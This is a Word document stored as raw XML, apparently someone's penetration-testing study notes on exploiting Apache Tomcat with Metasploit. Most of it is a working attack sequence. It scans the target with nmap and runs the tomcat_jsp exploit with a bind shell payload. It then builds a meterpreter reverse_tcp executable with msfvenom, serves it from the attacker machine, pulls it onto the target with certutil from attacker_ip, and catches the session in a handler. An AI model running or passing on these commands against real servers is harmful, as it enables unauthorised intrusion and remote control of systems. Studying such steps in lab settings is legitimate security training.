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F5C7" w14:textId="1C76950D" w:rsidR="00934728" w:rsidRPr="004E19EC" w:rsidRDefault="00934728">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00934728">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting A Vulnerable Apache Tomcat Web Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00934728">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE7EDA" w14:textId="2CBF1A59" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r w:rsidRPr="00A765FE">
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:r w:rsidRPr="00A765FE">
        <w:t>Tomcat =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A765FE">
        <w:t>Tomcat serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7417987D" w14:textId="19573FFD" w:rsidR="00934728" w:rsidRDefault="00F44CAE">
      <w:r>
        <w:t>Free and open-source java servlet webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DA487" w14:textId="3A62871F" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Use HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF6A02" w14:textId="7422641D" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Apache tomcat 8080 by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED39E3" w14:textId="77777777" w:rsidR="00A765FE" w:rsidRDefault="00A765FE"/>
    <w:p w14:paraId="6CE9F830" w14:textId="65CA25FE" w:rsidR="00A765FE" w:rsidRPr="00A765FE" w:rsidRDefault="00A765FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A765FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apache http we server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51652169" w14:textId="096E8503" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Host static and dynamic websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060081E" w14:textId="11DB3D2A" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Websites Developed in php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705241C3" w14:textId="66403F53" w:rsidR="001A14AA" w:rsidRDefault="001A14AA">
      <w:r>
        <w:t>Html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656F6802" w14:textId="77777777" w:rsidR="00A765FE" w:rsidRDefault="00A765FE"/>
    <w:p w14:paraId="634BCE9E" w14:textId="5EA94228" w:rsidR="00A765FE" w:rsidRPr="00A765FE" w:rsidRDefault="00A765FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A765FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tomcat server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D389DDA" w14:textId="100CA2A5" w:rsidR="00A765FE" w:rsidRDefault="00A765FE" w:rsidP="00A765FE">
      <w:r>
        <w:t>Host dynamic websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A7EC6A" w14:textId="74AB32AC" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Websites</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Developed in </w:t>
      </w:r>
      <w:r>
        <w:t>java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C40A66" w14:textId="77777777" w:rsidR="00A765FE" w:rsidRDefault="00A765FE"/>
    <w:p w14:paraId="26C40AE9" w14:textId="510F2564" w:rsidR="00A765FE" w:rsidRDefault="001A14AA">
      <w:r>
        <w:t>Apache tomcat v8.5.19</w:t>
      </w:r>
      <w:r w:rsidR="00557A52">
        <w:t xml:space="preserve"> and any version below v9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is vuln to RCE that allow to upload and execute </w:t>
      </w:r>
      <w:r w:rsidR="00557A52">
        <w:t>JSP payload to gain access to the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA8369" w14:textId="77777777" w:rsidR="00A765FE" w:rsidRDefault="00A765FE"/>
    <w:p w14:paraId="1D807DBF" w14:textId="050B7637" w:rsidR="00557A52" w:rsidRPr="00557A52" w:rsidRDefault="00557A52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D9EA77" w14:textId="77777777" w:rsidR="00557A52" w:rsidRDefault="00557A52"/>
    <w:p w14:paraId="79C04524" w14:textId="37F20681" w:rsidR="00557A52" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C53B33" w14:textId="49907CBF" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t xml:space="preserve">Msfconsole -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11288A1E" w14:textId="77777777" w:rsidR="00F01620" w:rsidRDefault="00F01620"/>
    <w:p w14:paraId="5DC6F2A7" w14:textId="050785F8" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Workspace -a tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20654ED9" w14:textId="774724F9" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C801BEE" w14:textId="4A236291" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A5BAA" w14:textId="77777777" w:rsidR="00F01620" w:rsidRDefault="00F01620"/>
    <w:p w14:paraId="0A37E1BC" w14:textId="1C06C31E" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Db_nmap -sS -sV -O target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A687568" w14:textId="77777777" w:rsidR="00F01620" w:rsidRDefault="00F01620"/>
    <w:p w14:paraId="3582710A" w14:textId="55158C19" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42945052" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRPr="00E61EFD" w:rsidRDefault="00E61EFD" w:rsidP="00E61EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r w:rsidRPr="00E61EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the browser and see that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDA3B32" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD" w:rsidP="00E61EFD">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="006764A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target_ip:8080</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="216F36C1" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="10171E88" w14:textId="6633D7C8" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Search type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E61EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name:tomcat_jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371057D" w14:textId="0D83A3EF" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Use (index no/name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F5A9C" w14:textId="665F45B9" w:rsidR="00F01620" w:rsidRDefault="00F01620">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319863CE" w14:textId="76663685" w:rsidR="00F01620" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4AE184" w14:textId="6B8D327B" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t xml:space="preserve"># give info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19028446" w14:textId="5734D9EF" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Set payload java/jsp_shell_bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CC7B0" w14:textId="103C1041" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t># as it use jsp so we use the java payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1E9706" w14:textId="6F58ACD0" w:rsidR="00E61EFD" w:rsidRDefault="004E19EC">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19EC">
        <w:t xml:space="preserve">That Tomcat JSP exploit only drops/executes </w:t>
      </w:r>
      <w:r w:rsidRPr="004E19EC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plain JSP shell code</w:t>
      </w:r>
      <w:r w:rsidRPr="004E19EC">
        <w:t xml:space="preserve"> (like java/jsp_shell_bind_tcp) — it doesn't support uploading or bootstrapping the Java Meterpreter agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F809C" w14:textId="672F2AB5" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t># we need to set the shell of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4FB46" w14:textId="0788C521" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Set SHELL cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2FAC88" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="2734C81D" w14:textId="2D3BD705" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442FD14" w14:textId="7CE67B90" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t># it take a few trys if not successful run again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AA4DE9" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="5397416F" w14:textId="14119C56" w:rsidR="00E61EFD" w:rsidRPr="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E61EFD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#Get the cmd shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A22C01" w14:textId="55E53AF0" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC8318F" w14:textId="2F6EBD65" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E557B6" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="0593D9A7" w14:textId="01A83565" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># this is not convenient , so we use the meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D435D01" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="70D5A59D" w14:textId="66F21CB8" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576201F" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="5FC36833" w14:textId="232501F4" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A875AF" w14:textId="683B9EB9" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t># java/linux cannot be convert in to meterpreter with th</w:t>
      </w:r>
      <w:r w:rsidR="004E19EC">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> post exploitation module .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB8A11" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="540595EA" w14:textId="7FFF5BA8" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>So we use the msfvenom for this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57D8D4" w14:textId="015EC705" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t xml:space="preserve">Generate the windows meterpreter payload and deliver it to the target with </w:t>
      </w:r>
      <w:r w:rsidR="004E19EC">
        <w:t xml:space="preserve">the help of by </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> making the webserver on the attacker machine and download on the target </w:t>
      </w:r>
      <w:r w:rsidR="004E19EC">
        <w:t xml:space="preserve">and run it with the help of </w:t>
      </w:r>
      <w:r w:rsidR="004E19EC">
        <w:t xml:space="preserve">Certutil </w:t>
      </w:r>
      <w:r>
        <w:t>and get the reverse meterpreter shell on the attacker machin</w:t>
      </w:r>
      <w:r w:rsidR="004E19EC">
        <w:t>e handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FA303C" w14:textId="77777777" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD"/>
    <w:p w14:paraId="3AB36E5B" w14:textId="3892CCF3" w:rsidR="00E61EFD" w:rsidRPr="006247DE" w:rsidRDefault="006247DE" w:rsidP="006247DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006247DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In new terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49832C60" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE" w:rsidP="006247DE"/>
    <w:p w14:paraId="04EBA09C" w14:textId="1419CB2A" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t>Msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=1234 -f exe &gt; meterpreter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCBADFD" w14:textId="2FDEB1CE" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714041D9" w14:textId="7D37682F" w:rsidR="00E61EFD" w:rsidRDefault="00E61EFD">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006247DE">
        <w:t>Sudo python -m SimpleHTTPServer 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA841D" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="28085FD5" w14:textId="5EC7E6E6" w:rsidR="006247DE" w:rsidRPr="000575E9" w:rsidRDefault="006247DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000575E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now in msfcinsole:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC1EDA" w14:textId="61298A62" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78101BE5" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="503CA51F" w14:textId="132576F6" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>In order to download the meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112790E1" w14:textId="5EB3BECF" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t xml:space="preserve">Certutil -urlcache -f </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="006764A7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://attacker_ip/meterpreter.exe</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  meterpreter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13FB94" w14:textId="11EE1339" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r w:rsidRPr="00B04FC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#certutil</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : is used in the window to download files form remove systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2AF329" w14:textId="309ABE37" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>#-f : file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A501221" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="68385FD5" w14:textId="4BD7117D" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D9E90" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="54897E38" w14:textId="0FA93D68" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t># now terminate the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD494D7" w14:textId="4EA7546E" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t># now setup the handler on the attacker to get the reverse meterpreter shell :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3988CCDC" w14:textId="450B83F8" w:rsidR="006247DE" w:rsidRPr="000575E9" w:rsidRDefault="006247DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000575E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t># in new terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4834E3DB" w14:textId="64FC2E4B" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Vim handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF456E" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="5AB01AAC" w14:textId="0FD82188" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>#in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9E783E" w14:textId="366166EB" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513FFEA7" w14:textId="311F1A50" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD8E021" w14:textId="34D90D22" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Set LHOST  attacker_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0839231E" w14:textId="763DDD9B" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39935919" w14:textId="258FB889" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C5DE2B" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE"/>
    <w:p w14:paraId="464C618A" w14:textId="475822A6" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t># save it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF32FF8" w14:textId="761053DE" w:rsidR="006247DE" w:rsidRDefault="000575E9">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="006247DE">
        <w:t>Now</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514E8E6D" w14:textId="77777777" w:rsidR="006247DE" w:rsidRDefault="006247DE">
      <w:r>
        <w:t>Msfconsole -q -r handler.rc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044691E1" w14:textId="77777777" w:rsidR="000575E9" w:rsidRDefault="000575E9"/>
    <w:p w14:paraId="7F74683D" w14:textId="77777777" w:rsidR="000575E9" w:rsidRDefault="000575E9"/>
    <w:p w14:paraId="5701B9A7" w14:textId="103E89CA" w:rsidR="000575E9" w:rsidRPr="000575E9" w:rsidRDefault="000575E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000575E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Now to main msfconsole :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B6D6B" w14:textId="4B4DD2D6" w:rsidR="000575E9" w:rsidRDefault="000575E9">
      <w:r>
        <w:t>./meterpreter.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BD188" w14:textId="77777777" w:rsidR="000575E9" w:rsidRDefault="000575E9"/>
    <w:p w14:paraId="1631AEAF" w14:textId="300679E9" w:rsidR="000575E9" w:rsidRDefault="000575E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000575E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In the handler we get the meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06102D42" w14:textId="7978A2D4" w:rsidR="000575E9" w:rsidRDefault="000575E9">
      <w:r>
        <w:t xml:space="preserve">Sysinfo </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BA7D9D" w14:textId="6D4696DC" w:rsidR="000575E9" w:rsidRDefault="000575E9">
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56636F2F" w14:textId="77777777" w:rsidR="000932BC" w:rsidRDefault="000932BC"/>
    <w:p w14:paraId="15AF116B" w14:textId="1D6F6ADD" w:rsidR="00A765FE" w:rsidRPr="00A765FE" w:rsidRDefault="00A765FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A765FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NOTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEBB6FE" w14:textId="291E0155" w:rsidR="00A765FE" w:rsidRDefault="00A765FE">
      <w:r>
        <w:t>Apache , Nginx run by default on 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355F367" w14:textId="4483B02C" w:rsidR="00557A52" w:rsidRDefault="00557A52">
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSP (JavaServer Pages)</w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server-side web technology</w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve"> that allows you to create </w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic web pages using Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3C6B30" w14:textId="04BA3BE2" w:rsidR="00557A52" w:rsidRDefault="00557A52">
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve">When a JSP page runs, the web server </w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>converts it into a servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve"> (a Java program) that handles the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B195AF" w14:textId="7AE402A4" w:rsidR="00557A52" w:rsidRDefault="00557A52">
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00557A52">
        <w:t xml:space="preserve"> is a Java class that runs on a web server (inside a servlet container like Tomcat) to handle HTTP requests and produce HTTP responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0D92D" w14:textId="77777777" w:rsidR="00B04FC7" w:rsidRDefault="00B04FC7"/>
    <w:p w14:paraId="2C2549C1" w14:textId="50632B5E" w:rsidR="00B04FC7" w:rsidRDefault="00B04FC7" w:rsidP="00B04FC7">
      <w:r w:rsidRPr="00B04FC7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>certutil:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used in the window to download files form remove systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0B78C8" w14:textId="77777777" w:rsidR="00B04FC7" w:rsidRDefault="00B04FC7"/>
    <w:p w14:paraId="056276F4" w14:textId="56E3060A" w:rsidR="001E15D9" w:rsidRDefault="001E15D9">
      <w:r>
        <w:t>Meterpreter shell is much better the the cmd shell.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001E1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93"/>
    <w:rsid w:val="000575E9"/>
    <w:rsid w:val="000932BC"/>
    <w:rsid w:val="000B3118"/>
    <w:rsid w:val="001A14AA"/>
    <w:rsid w:val="001E15D9"/>
    <w:rsid w:val="004E19EC"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00557A52"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006247DE"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00934728"/>
    <w:rsid w:val="00A31071"/>
    <w:rsid w:val="00A765FE"/>
    <w:rsid w:val="00B04FC7"/>
    <w:rsid w:val="00E61EFD"/>
    <w:rsid w:val="00E63993"/>
    <w:rsid w:val="00F01620"/>
    <w:rsid w:val="00F4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6C8E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1C17A2AF-A7DF-45EF-BB97-BEB76D38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ttacker_ip/meterpreter.exe" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://target_ip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427</Words>
  <Characters>2627</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>61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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-06T06:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-06T07:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>